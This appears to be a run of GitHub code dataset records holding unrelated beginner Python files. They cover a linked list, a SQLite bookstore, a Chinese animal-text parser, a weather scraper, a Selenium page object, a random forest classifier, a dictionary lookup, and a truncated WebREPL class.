self.head\r\n item._next = head\r\n self.head = item\r\n self.length += 1\r\n\r\n else:\r\n counter = index-1\r\n node = self.head\r\n self.length += 1\r\n \r\n while counter>0:\r\n node = node._next\r\n counter -=1\r\n node_next = node._next\r\n item._next = node_next\r\n node._next = item\r\n def delete(self,index):\r\n if self.isEmpty():\r\n print('Linked list is empty')\r\n elif index == 0:\r\n node = self.head._next\r\n self.head = node\r\n elif index>=self.length or index<0:\r\n print('index too big or small')\r\n else:\r\n node = self.head\r\n while index-1>0:\r\n node = node._next\r\n index -= 1\r\n node_next = node._next\r\n node._next = node_next._next\r\n \r\n# def trans_to_array(self):\r\n# new_array = [[]]*(3*self.length)\r\n# node = self.head\r\n# \r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n first_list = linked_list()\r\n# first_list.insert(20,0)\r\n first_list.append(60)\r\n first_list.append(80)\r\n first_list.insert(70,first_list.length)\r\n print(first_list)\r\n print(first_list.length)\r\n first_list.delete(3)\r\n \r\n print(first_list)\r\n a = first_list.head\r\n# print(first_list,first_list.head.data)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"JIACHENG135/leetcode2","sub_path":"算法导论/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"16388993240","text":"import sqlite3\n\n\n### THIS IS NOT THE MOST OPTIMIZED AND CLEAN WAY TO WRITE THE CLASS - CHECK \"BookStore_Back_optimized\" FILE - TO SEE HOW TO MAKE IT EVEN CLEANER \n\n\nclass DB_operations():\n\n def __init__(self,title=None,year=None,author=None,isbn=None):\n\n self.title=title\n self.year=year\n self.author=author\n self.isbn=isbn\n\n\n def create_table(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS books(title TEXT, year TEXT, author TEXT, isbn TEXT)\")\n db.commit()\n db.close()\n\n \n def insert_db(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n cur.execute(\"INSERT INTO books VALUES(?,?,?,?)\",( self.title,self.year,self.author,self.isbn))\n db.commit()\n db.close()\n\n\n def search_db(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n #DISTINCT DELETES DUPLICATE ROWS AND LEAVES ONLY ONE INSTANCE\n cur.execute(\"SELECT DISTINCT title,year,author,isbn FROM books WHERE title=? OR year=? OR author=? OR isbn=?\",( self.title,self.year,self.author,self.isbn))\n view=cur.fetchall()\n return view\n db.close()\n\n def view_all(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n #DISTINCT DELETES DUPLICATE ROWS AND LEAVES ONLY ONE INSTANCE\n cur.execute('SELECT DISTINCT title,year,author,isbn FROM books')\n view=cur.fetchall()\n return view\n db.close()\n\n def update_table(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n while True:\n try:\n cur.execute(\"UPDATE books SET title=?, year=?, author=?, isbn=? WHERE isbn=?\",( self.title,self.year,self.author,self.isbn,self.isbn))\n break\n except:\n print(\"Please enter a valid ISBN\")\n db.commit()\n db.close()\n\n def delete_table(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n #DELETES THE ENTIRE ROW\n cur.execute(\"DELETE FROM books WHERE isbn=?\",(self.isbn,))\n db.commit()\n db.close()\n\n def delete_all(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n #DELETES EVERYTHING\n cur.execute(\"DELETE FROM books\")\n db.commit()\n db.close()\n\n\n \n \n\n\n#db=DB_operations(\"Toshko\",2008,\"manga\",\"1232421561\")\n#db.insert_db()\n#db=DB_operations(\"Harry Potter\",2002,\"J.K.Rowling\",\"1232421540\")\n \n","repo_name":"BogoCvetkov/Small_Projects","sub_path":"Python projects/Simple Tkinter App/BookStore_Back.py","file_name":"BookStore_Back.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31690097843","text":"import re\n\nfrom common.slicer import slice_text, slice_organs\n\n\nclass AnimalCommon:\n org_slices = {}\n\n def get_org_name(self, text):\n ret, name_regex = '', ''\n for name_regex, info in self.org_slices.items():\n result = re.match(name_regex, text)\n if result:\n ret = result[0]\n break\n\n return ret, name_regex\n\n @staticmethod\n def pack_sample(text):\n ret = dict()\n\n for item in re.split(r';;', text):\n ret[f'标本:{item}'] = {}\n\n return ret\n\n def slice(self, text):\n ret = dict()\n\n sex = ''\n com = re.compile(r'([雌雄♀♂]性?)')\n info = com.match(text)\n if info:\n sex = info[0]\n if sex == '♂':\n sex = '雄'\n elif sex == '♀':\n sex = '雌'\n\n text = text.lstrip('雌雄性♀♂::')\n\n for paragraph in re.split(r'。', text):\n if text.startswith('标本记录'):\n ret.update(self.pack_sample(paragraph))\n continue\n\n name, regex = self.get_org_name(paragraph)\n if name:\n detail = paragraph.lstrip(name).lstrip(',,其的:')\n cont_dict = slice_organs(detail, self.org_slices[regex])\n if name not in ret:\n ret[name] = cont_dict\n else:\n ret[name].update(cont_dict)\n else:\n ret.update(slice_text(paragraph))\n\n return {sex: ret} if sex else ret\n\n\nclass MiXia(AnimalCommon):\n org_slices = {\n '额角': ['末端', '上缘', '基部', '下缘'],\n '头胸甲': ['长度', '前侧'],\n '尾节': ['背面', '末端', '末缘', '中央', '背侧', '末端'],\n # '侧刺': [],\n '间刺': ['中央间刺', '外侧间刺'],\n '柄刺': [],\n '肛前脊': [],\n r'(第\\d触角)': ['柄刺', '第1节', '第2节', '第3节', '鳞片', '内肢'],\n r'(第\\d颚足)': ['末节', '顶端', '末节', '约等于', '内肢', '末端', '末2节'],\n r'(第\\d步足)': ['长节', '腕节', '螯', '螫', '掌节', '掌', '指节', '座节', '前缘', '腹缘', '末端', '长'],\n r'(第\\d腹肢)': ['内肢', '内缘', '长', '基部', '末端', '末部', '内肢', '内附肢'],\n # '尾肢': [],\n '卵': ['卵径']\n }\n\n\nclass ZhiHuanChong(AnimalCommon):\n org_slices = {\n '成虫': ['虫体', '体长', '体宽', '长', '宽', '全长'],\n '咽': ['大小'],\n '后吸器': ['边缘', '柄', '钩尖', '小钩', '长'],\n '中央大钩': ['交接管', '基部', '交接器', '边缘', '钩尖', '全长', '外突', '内突'],\n '边缘': ['小钩', '长', '全长'],\n '联结片': ['中部', '两端', '副联结片', '大小'],\n '副联结片': ['大小'],\n '支持器': ['外缘', '凹面', '中部', '薄片', '柄端', '基部', '前端', '棒片', '交接管', '全长', '基端', '端部', '长', '叉', '一叉'],\n '交接管': ['基径', '管径', '管长', '端部', '基部', '支持器', '外缘', '凹面', '中部', '薄片', '长', '基端'],\n '阴道': ['管', '末端', '管长', '直径', '泡状部分', '泡状', '长', '盘圈'],\n \"卵子\": ['卵', '长', '宽', '具']\n }\n\n\nclass Luo:\n @staticmethod\n def slice(text):\n ret = dict()\n\n if text.startswith('壳高'):\n com = re.compile(r'([\\u4e00-\\u9fa5]*)(\\d*[.。.]*\\d*[a-zA-Z]*)')\n for item in com.findall(text):\n if item[0] and item[1]:\n ret[f'{item[0]}:{item[1]}'] = {}\n\n return {'标本测量:': ret} if ret else ret\n\n\nclass Feng(AnimalCommon):\n org_slices = {\n '头': ['触角', '柄节', '上颊', '后头', '头顶', '脸', '蠢基', '唇基', '口窝', '颊', '颚眼', '近后头脊', '近复眼', '顶',\n '微毛区', '端', '颅顶', '颊', '颜面', 'POL', '下脸', '中胸盾片', '复眼', '上颚', '上唇'],\n '翅': ['缘室', 'r脉', 'SR1+3-SR脉', 'SR1+3-SR脉', '2-SR脉', 'cu-a脉', 'M+CU脉', '前翅SR1脉', '2-M脉', 'CH-a脉', '前翅', '翅痣',\n '1-R1脉'],\n '胸': ['长', '前胸背板', '基节', '后胸', '中胸', '盾', '小盾片', '后胸背板', '基', '并胸腹节'],\n '足': ['跗爪', '后足腿节', '后足胫节', '后足跗节', '爪', '基跗节', '基节', '前后足腿节', '转节', '前后足腿节', '中足', '前后足'],\n '腹': ['第1背板', '第2背板', '基区', '第3背板', '第4背板', '其余背板', '第2—3背板', '产卵管', '背脊',\n '背', '气门', '背板', '下生殖板', '鞘', '产卵管', '柄', '前部', '两侧', '第1-2背板及第3背板基半', '产卵管鞘'],\n '变异': ['触角', '产卵管', '腹部', '其他'],\n '触角': ['梗节', '索节', '棒节', '柄节', '第1鞭节', '第2鞭节', '第3鞭节', '上端', '第一索节', '第二索节',\n '腹部第2-6节', '第1—3节', '第4—6节', '第7节', '第6腹板', '生殖刺突']\n }\n\n def my_slice(self, text):\n ret = dict()\n\n for para in re.split('。', text):\n com = re.compile(r'(.*?)([深浅黄褐黑锈].*?色)[,;。]')\n\n color_info = dict()\n for item in com.findall(para):\n color_info[f'{item[0]}:{item[1]}'] = {}\n\n if color_info:\n ret.update(color_info)\n else:\n ret.update(self.slice(para))\n\n return ret\n\n\nclass Sou(AnimalCommon):\n org_slices = {\n '头部': ['头缝', '两侧', '后角', '后缘', '复眼', '触角', '基节', '第1节', '第2节', '第3节', '第4节', '第5节', '其余各节'],\n '前胸背板': ['前缘', '两侧', '后缘', '背面', '中沟', '后翅'],\n '前翅': ['肩角', '外缘', '内后角', '内、外后角', '表面'],\n '腹部': ['雄虫两侧', '后缘', '后部', '末腹'],\n '末腹': ['背板', '两侧', '后角', '后缘', '后部'],\n '尾铗': ['前部', '后部', '两支', '顶端', '内缘', '雌虫尾铗', '基部'],\n '亚末腹': ['板', '后缘', '表面'],\n '足': ['后足跗节', '腿节', '腹面'],\n '臀板': ['基部', '两侧', '后外侧', '后缘', '两后角'],\n '阳茎': ['阳茎叶端', '阳茎端刺', '基囊'],\n '鞘翅': ['前翅', '后缘', '后内角', '后翅', '外缘'],\n '触角': ['基节', '第2节', '第3节', '第4节', '其余各节'],\n '雌虫': ['末腹背板甚', '基部', '两尾铗', '后部', '顶端']\n }\n\n def my_slice(self, text):\n ret = dict()\n\n for item in re.split(r'。', text):\n if item.startswith('体长'):\n for p in re.split(r'[;;]', item):\n ret[p] = {}\n else:\n ret.update(self.slice(item))\n\n return ret\n\n\nclass Ya(AnimalCommon):\n org_slices = {\n '玻片标本': ['头部、胸部', '头部', '胸部', '腹部', '喙、足', '喙', '足', '跗节', '腹管、尾片',\n '腹管', '尾片', '触角', '其他', '中、后胸', '腹'],\n '触角': ['触角毛', '一般各节', '各节', '长毛', '原生感觉圈', '次生感觉圈', '基部'],\n '腹部': ['背片'],\n '体表': ['头', '腹部', '背片']\n }\n\n def my_slice(self, text):\n ret = dict()\n com = re.compile(r'([有无]翅孤雌蚜):?(.*)')\n\n for item in com.findall(text):\n ret.update({item[0].rstrip(':'): self.slice(item[1])})\n\n return ret\n\n\nclass Jie(AnimalCommon):\n org_slices = {\n '触角': [],\n '刺孔群': []\n }\n\n\nclass Chun(AnimalCommon):\n org_slices = {\n '体': ['体色', '毛', '臭腺'],\n '前胸背板': ['胝', '亚后缘', '后缘', '刻点', '毛'],\n '头': ['头宽', '长', '头顶'],\n '触角': ['第Ⅰ节', '雄虫', '雌'],\n '前翅': [],\n '膜片': [],\n '革片': [],\n '足': ['股节', '胫节', '后足', '基节', '前、中足', '各足胫节'],\n r'[左右]阳基': ['侧突', '端突', '端部', '基部', '近端部'],\n '阳茎': ['鞘', '端针'],\n '唇基': []\n }\n\n def my_slice(self, text):\n\n ret = dict()\n data = re.match(r'(量度\\(?m{0,2}\\)?)', text)\n if data:\n org_list = ['体长', '体宽', '头长', '头顶', '触角各节长', '后缘宽', '革片长', '楔片长', '前胸背板', '头宽']\n ret[data[0]] = slice_organs(text.replace(data[0], '').lstrip(':'), org_list)\n else:\n ret.update(self.slice(text))\n\n return ret\n\n\ndef slice_text_by_animal_org(keyword, text):\n ret = dict()\n\n if '米虾' in keyword:\n ret.update(MiXia().slice(text))\n\n elif '指环虫' in keyword or '三代虫' in keyword:\n ret.update(ZhiHuanChong().slice(text))\n\n elif keyword.endswith('螺'):\n ret.update(Luo().slice(text))\n\n elif keyword.endswith('蜂'):\n ret.update(Feng().slice(text))\n\n elif keyword.endswith('螋'):\n ret.update(Sou().my_slice(text))\n\n elif '蚜' in keyword:\n ret.update(Ya().my_slice(text))\n\n elif '蚧' in keyword:\n ret.update(Jie().slice(text))\n\n elif '蝽' in keyword:\n ret.update(Chun().my_slice(text))\n\n return ret\n","repo_name":"HinsChueng/baike_spider","sub_path":"animals.py","file_name":"animals.py","file_ext":"py","file_size_in_byte":9519,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17917865437","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport re\nimport csv\nimport sys\n\nf = open(sys.argv[1], 'wt')\n\nurl=\"http://panahon.observatory.ph/index.html\"\npage=urlopen(url)\nsoup = BeautifulSoup(page.read())\n\nareas=soup.findAll('div',{'id':re.compile(\"\\w*-rain$\")})\n\ntry:\n\twriter = csv.writer(f)\n\twriter.writerow( ('Station', 'Timestamp', 'Rainfall') )\n\tfor eacharea in areas:\n\t\tdetails = eacharea.findAll('span',{'class':'highlight'})\n\t\twriter.writerow(((eacharea.get('id')),(details[0].text),(details[1].text)))\nfinally:\n\tf.close()\n\nprint (open(sys.argv[1], 'rt').read())","repo_name":"hailmika/mo-scraper","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71696622241","text":"import os\r\nimport sys\r\nimport argparse\r\n\r\n\r\ndef main():\r\n args = parse_arguments()\r\n try:\r\n return logToDns(args.domain_name, args.ip_address)\r\n except:\r\n return \"ERR\"\r\n\r\n\r\ndef parse_arguments():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--domain_name\", default=None, help=\"Credentials, plz\", required=True)\r\n parser.add_argument(\"--ip_address\", default=None, help=\"Credentials, plz\", required=True)\r\n args = parser.parse_args()\r\n return args\r\n\r\n\r\ndef logToDns(new_name, raw_addy):\r\n usr = \"super_secure_dns_user\"\r\n pwd = os.getenv('dns_pswd')\r\n # You need to write this yourself as it's specific to your environment.\r\n\r\nif __name__ == '__main__':\r\n try:\r\n main()\r\n except KeyboardInterrupt:\r\n print('Interrupted \\_[*.*]_/\\n')\r\n try:\r\n sys.exit(0)\r\n except SystemExit:\r\n os._exit(0)\r\n","repo_name":"gjbsaiia/easyJoinAPI","sub_path":"backend/updateDNS.py","file_name":"updateDNS.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"24519085023","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait as wait\n\nfrom .InterfaceConfig import InterfaceConfig\nfrom Modules.element_attributes import element_visible_and_enabled\n\n\nclass IpMappings(InterfaceConfig):\n\n def __init__(self, driver):\n super().__init__(driver)\n\n def open(self):\n settings = self.driver.find_element(By.CSS_SELECTOR, 'a[href=\"/settings/\"]')\n settings.click()\n ip_mappings = self.driver.find_element(By.CSS_SELECTOR, 'a[href=\"/settings/ip_mappings/\"]')\n ip_mappings.click()\n\n def add_entries(self, list_of_entries_tuples):\n \"\"\"Will add entries entered as a list of tuples(node_name, ims_entity,ip_addr)\"\"\"\n self.wait_for_add_entry_table_to_load()\n rows_count = len(list_of_entries_tuples)\n # Loop through Add Entries table and click the + to add rows\n for row in range(rows_count - 1):\n self.driver.find_element(\n By.CSS_SELECTOR,\n '#table-new-mapping tbody > tr > td .fa.fa-plus').click()\n # extract all rows in the mappings table 'tr' elements\n rows = self.driver.find_elements(\n By.CSS_SELECTOR, '#table-new-mapping tbody tr')\n # Loop through the new rows in Add Entries table and add data\n for index in range(rows_count):\n node_name, ims_entity, ip_addr = rows[index].find_elements(By.CSS_SELECTOR, 'input')\n # send data to field\n node_name.send_keys(list_of_entries_tuples[index][0])\n ims_entity.send_keys(list_of_entries_tuples[index][1])\n ip_addr.send_keys(list_of_entries_tuples[index][2])\n add_node = self.driver.find_element(\n By.CSS_SELECTOR, '#new-mapping-form .btn.btn-primary')\n add_node.click()\n\n def delete_entries(self, list_of_entries_tuples):\n for entry in list_of_entries_tuples:\n search = self.driver.find_element(By.CSS_SELECTOR, '.float-right.search > input')\n # search using ip address as it's unique\n search.send_keys(entry[2].lower(), Keys.ENTER)\n self._wait_mapping_table_load()\n # Using sleep as the search is too slow and makes the wait refer to wrong element\n row_remove = self.driver.find_element(\n By.CSS_SELECTOR, '#table-ip-mappings > tbody > tr td .fa.fa-remove')\n row_remove.click()\n search.clear()\n\n def bulk_delete_verify_deleted(self, list_of_entries_tuples):\n self.add_entries(list_of_entries_tuples)\n self.jump_to_last_page()\n self._wait_mapping_table_load()\n table_rows = self.driver.find_elements(\n By.CSS_SELECTOR, '#table-ip-mappings > tbody tr')\n for row in table_rows:\n cell = row.find_elements(By.CSS_SELECTOR, 'td')\n cell_checkbox = row.find_element(By.CSS_SELECTOR, 'input')\n for entry in list_of_entries_tuples:\n if cell[3].text == entry[2]:\n cell_checkbox.click()\n break\n delete_button = self.driver.find_element(By.CSS_SELECTOR, '#btn-delete-mappings')\n delete_button.send_keys(Keys.ENTER)\n self._wait_mapping_table_load()\n self.verify_deleted(list_of_entries_tuples)\n\n def jump_to_last_page(self):\n if element_visible_and_enabled(self.driver, '.page-last > a'):\n show_table_last_page = self.driver.find_element(By.CSS_SELECTOR, '.page-last > a')\n show_table_last_page.click()\n\n def get_help_verify(self):\n get_help = self.driver.find_element(\n By.CSS_SELECTOR,\n 'a[href=\"/help_text/ip_mappings/\"] .fa-question-circle')\n main_window_handle = self.driver.window_handles[0]\n get_help.click()\n all_windows_handles = self.driver.window_handles\n for handle in all_windows_handles:\n if handle != main_window_handle:\n self.driver.switch_to.window(handle)\n wait(self.driver, 10).until(ec.text_to_be_present_in_element(\n (By.TAG_NAME, 'h1'), 'IP Mappings'))\n header_csv_style = self.driver.find_element(By.TAG_NAME, 'h4')\n help_text = self.driver.find_element(By.TAG_NAME, 'p')\n mandatory = self.driver.find_element(By.TAG_NAME, 'ul')\n # assert header_ip_mapping.text == 'Interface Config'\n assert header_csv_style.text == 'CSV style for uploading IP mappings'\n assert help_text.text == ('The CSV must have the columns:\\nNode name, IMS entity, IP address'\n '\\nThe columns must be in this order! You can specify if you have a headline'\n ' or not.\\nYou can choose between following delimiters: \",\" \";\"\\n'\n '\\nThe mapping list must include at least the following node types:')\n\n assert mandatory.text == 'P-CSCF\\nS-CSCF'\n self.driver.close()\n self.driver.switch_to.window(main_window_handle)\n","repo_name":"l33t3mr/python-automation","sub_path":"SETA-Frontend/Classes/POM/IpMappings.py","file_name":"IpMappings.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30467899099","text":"import time\r\n\r\nstart = time.time()\r\nprint(start)\r\nimport mysql.connector\r\n\r\n\r\ndef fetch_table_data(table_name):\r\n # The connect() constructor creates a connection to the MySQL server and returns a MySQLConnection object.\r\n cnx = mysql.connector.connect(user='root', password='root', host='localhost', database='mydatabase1')\r\n\r\n cursor = cnx.cursor()\r\n query = \"select REGISTRATION NO,STUDENT EMAIL ID from \" + table_name\r\n print(query)\r\n query1 = \" where OrderID='170386207'\"\r\n query2 = query + query1\r\n print(query2)\r\n cursor.execute(\"select ORDERId from \" + table_name + \" where OrderID>'1000'\")\r\n\r\n header = [row[0] for row in cursor.description]\r\n\r\n rows = cursor.fetchall()\r\n\r\n # Closing connection\r\n cnx.close()\r\n\r\n return header, rows\r\n\r\n\r\ndef export(table_name):\r\n header, rows = fetch_table_data(table_name)\r\n column_name = \"ItemType\"\r\n # Create csv file\r\n f = open(column_name + '.csv', 'w')\r\n\r\n # Write header\r\n f.write(','.join(header) + '\\n')\r\n\r\n for row in rows:\r\n f.write(','.join(str(r) for r in row) + '\\n')\r\n\r\n f.close()\r\n print(str(len(rows)) + ' rows written successfully to ' + f.name)\r\n\r\n\r\n# Tables to be exported\r\n# export('customers4')\r\nexport('student')\r\nend = time.time()\r\ntime_taken = end - start\r\nprint(time_taken)\r\n","repo_name":"gargvivek24/python_dummy_project","sub_path":"databasetocsv.py","file_name":"databasetocsv.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1397615044","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 16 14:03:53 2020\r\n\r\n@author: Rahmesses\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sklearn\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn import preprocessing\r\nfrom sklearn.utils import resample\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.externals import joblib\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Dropout\r\n\r\n\r\nclass PredictOutcome(): \r\n \r\n def Read_Data(): # Read data from input path\r\n \r\n train = pd.read_csv(path + \"/\" + \"train.csv\")\r\n test = pd.read_csv(path+ \"/\" + \"test.csv\")\r\n \r\n return train,test\r\n \r\n def Preprocess(df): # Data preprocessing\r\n \r\n df.gender =df.gender.fillna(df.gender.mode()[0]) # Fill NA with mode of gender\r\n \r\n # Normalize continuous numeric features and create dummies for categrical features\r\n \r\n normalize = preprocessing.MinMaxScaler() \r\n df=pd.get_dummies(df,columns=['device_type','gender','in_initial_launch_location','n_drivers','n_vehicles'])\r\n df.age = normalize.fit_transform(df[['age']].astype(np.float))\r\n df.income = normalize.fit_transform(df[['income']].astype(np.float))\r\n df.cost_of_ad = normalize.fit_transform(df[['cost_of_ad']].astype(np.float))\r\n df.prior_ins_tenure = normalize.fit_transform(df[['prior_ins_tenure']].astype(np.float))\r\n \r\n return df\r\n \r\n def TrainModel(): #Model Training\r\n \r\n train = PredictOutcome.Read_Data()[0]\r\n train= PredictOutcome.Preprocess(train)\r\n \r\n # Data is imbalanced. Undersampling the class in majority and Oversampling class in minority to match the observation count\r\n \r\n outcome_0 = train[train.outcome==0]\r\n outcome_1 = train[train.outcome==1]\r\n train_downsampled_0 = resample(outcome_0,replace=True,n_samples=len(outcome_0)//5,random_state=27)\r\n train_upsampled_1 = resample(outcome_1,replace=True,n_samples=len(outcome_0)//5,random_state=27)\r\n \r\n train = pd.concat([train_downsampled_0,train_upsampled_1])\r\n \r\n # Creating numpy arrays for model input\r\n \r\n X = train.loc[:,train.columns!='outcome'].values\r\n Y = train.loc[:,train.columns=='outcome'].values\r\n \r\n # Split the training data into train and validate\r\n\r\n X_train, X_validate, Y_train, Y_validate = train_test_split(X,Y,test_size=0.2, random_state=25)\r\n \r\n # Random Forest Model and predictions\r\n# \r\n RF_Model = RandomForestClassifier(n_estimators = 200, random_state = 42)\r\n RF_Model.fit(X_train,Y_train.ravel())\r\n pred_RF = RF_Model.predict(X_validate)\r\n \r\n# model = Sequential()\r\n# model.add(Dense(1000, input_dim = 18, activation= 'sigmoid'))\r\n# #model.add(Dropout(0.2))\r\n# model.add(Dense(1000, activation= 'relu'))\r\n# model.add(Dropout(0.2))\r\n# model.add(Dense(1000, activation= 'relu'))\r\n# model.add(Dropout(0.2))\r\n# #model.add(Dense(100, activation= 'relu'))\r\n# # model.add(Dropout(0.2))\r\n# #model.add(Dense(100, activation= 'relu'))\r\n# #model.add(Dropout(0.2))\r\n# model.add(Dense(1, activation= 'sigmoid'))\r\n# \r\n# model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\r\n# \r\n# ## Training\r\n# \r\n# model.fit(X_train, Y_train, epochs=25, batch_size=100)\r\n# \r\n# ## Accuracy\r\n# \r\n# _, accuracy = model.evaluate(X_train, Y_train)\r\n# print('Accuracy: %.2f' % (accuracy*100))\r\n# \r\n# ## Predictions\r\n# \r\n# predictions = model.predict_classes(X_validate)\r\n# \r\n \r\n ## 10 predictions\r\n \r\n #for i in range(10):\r\n \t#print('%s => %d (expected %d)' % (X_test[i].tolist(), predictions[i], Y_test[i]))\r\n \r\n \r\n # Model Evaluation Metrics. Plot ROC and Calculate AUC\r\n \r\n fpr_RF = dict()\r\n tpr_RF = dict()\r\n roc_auc_RF = dict()\r\n \r\n fpr_RF, tpr_RF, _ = roc_curve(Y_validate, pred_RF)\r\n roc_auc_RF = auc(fpr_RF,tpr_RF)\r\n \r\n plt.figure()\r\n lw = 2\r\n plt.plot(fpr_RF, tpr_RF, color='darkorange', label='ROC curve (area = %0.2f)' % roc_auc_RF)\r\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\r\n plt.xlim([0.0, 1.0])\r\n plt.ylim([0.0, 1.05])\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n plt.title('ROC - Random Forest')\r\n plt.legend(loc=\"lower right\")\r\n plt.show()\r\n \r\n print(\"AUC of the model:\",auc(fpr_RF,tpr_RF))\r\n \r\n # Store Model for later use in the designated path\r\n \r\n # joblib.dump(RF_Model, path + \"/\" + \"NN_Model\")\r\n \r\n def Predict():\r\n \r\n # Preprocessing test data for model input\r\n \r\n test_original = PredictOutcome.Read_Data()[1]\r\n test = PredictOutcome.Preprocess(test_original)\r\n \r\n # Load stored model\r\n \r\n RF_Model = joblib.load(path + \"/\" + \"RF_Model\")\r\n \r\n predict = RF_Model.predict(test) # Predictions\r\n \r\n test_original['outcome'] = predict # Add predicted values in test_original\r\n \r\n return test_original.to_csv(path + \"/\" + \"PredictedTest.csv\",index=False) # Store data in CSV file\r\n \r\n def main():\r\n #global path\r\n #path = input(\"Please enter the path\")\r\n PredictOutcome.TrainModel()\r\n PredictOutcome.Predict()\r\n \r\nif __name__ == \"__main__\":\r\n \r\n path = input(\"Please enter the path of stored files\")\r\n PredictOutcome.main()","repo_name":"rahmesses/Random-Forrest-for-Class-Imbalance-Problem","sub_path":"RandomForrest_Unbalanced_Class_Problem.py","file_name":"RandomForrest_Unbalanced_Class_Problem.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17970705170","text":"import json, random\nimport urllib\nfrom urllib import request\n\n\n# title\n# genre\n# id - way to store specific movie for favorites list\n\ndef get_def(word):\n try:\n f=open(\"./dictKey.txt\",\"r\")\n except FileNotFoundError as e:\n raise Exception('<file>.txt is not found')\n\n s=f.read().rstrip(\"\\n\")\n f.close()\n url = \"https://dictionaryapi.com/api/v3/references/collegiate/json/\" + word + \"?key=\" + s\n\n defin = []\n try:\n raw = request.urlopen(url)\n info = json.loads(raw.read())\n for i in info:\n defin.append(i['shortdef'])\n\n #for i in defin:\n # print(i)\n # print(\"\\n\")\n except:\n # wont be scrambled\n print(\"NO\")\n\n #print(defin)\n\n if len(defin) != 0:\n success = True\n random_def = random.choice(defin[0])\n else:\n success = False\n random_def = ''\n #print(random_def)\n\n return (success, random_def)\n\nword = \"tom\"\nprint(get_def(word))\n","repo_name":"mffoley/pseudowoodo","sub_path":"util/dictAPI.py","file_name":"dictAPI.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37609265306","text":"\"\"\"Write a Python program to find the index of the largest prime in the list and\nthe sum of its digits. Go to the editor\nInput: [3, 7, 4]\nOutput:\n[1, 7]\nInput: [3, 11, 7, 17, 19, 4]\nOutput:\n[4, 10]\nInput: [23, 17, 201, 14, 10473, 43225, 421, 423, 11, 10, 2022, 342157]\nOutput:\n[6, 7]\"\"\"\n\n\ndef isPrime(nums):\n for i in range(len(nums)):\n max_num = max(nums)\n for k in range(2, int(max_num ** 0.5) + 1):\n if max_num % k == 0:\n break\n else:\n return max_num\n return False\n\n\ndef test(primes):\n max_num = isPrime(primes)\n if max_num is not False:\n if len(str(max_num)) == 1:\n return [primes.index(max_num), max_num]\n else:\n cnt_list = list(map(lambda x: int(x), str(max_num)))\n return [primes.index(max_num), sum(cnt_list)]\n\n\ninput_nums = [3, 11, 7, 17, 19, 4]\nprint(test(input_nums))\n\ninput_nums = [3, 7, 4]\nprint(test(input_nums))\n\ninput_nums = [3, 7, 4, 13, 31]\nprint(test(input_nums))\n","repo_name":"mirshoddev99/Problems-Patterns","sub_path":"Python-100-Exercise/solutions/70-80/76_prob.py","file_name":"76_prob.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30248160941","text":"import gc\nimport json\nimport socket\n\nimport _webrepl\nimport network\nimport uos\nimport websocket\nimport websocket_helper\nfrom emp_utils import rainbow\n\n\nclass WebREPL():\n _instance = None\n\n @classmethod\n def send(cls,json_data):\n WebREPL().ws.write(json_data)\n\n\n\n def __new__(cls):\n if not cls._instance:\n cls._instance = super(WebREPL, cls).__new__(cls)\n cls._instance.ws = None\n cls._instance.listen_s = None\n cls._instance.client_s = None\n cls._instance.wr = None\n return cls._instance\n\n @classmethod\n def setup_conn(cls,port, accept_handler):\n WebREPL().listen_s = socket.socket()\n WebREPL().listen_s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n ai = socket.getaddrinfo(\"0.0.0.0\", port)\n addr = ai[0][4]\n\n 